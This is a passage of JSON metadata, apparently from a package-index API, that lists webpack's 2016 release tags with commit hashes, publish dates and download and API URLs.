},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.c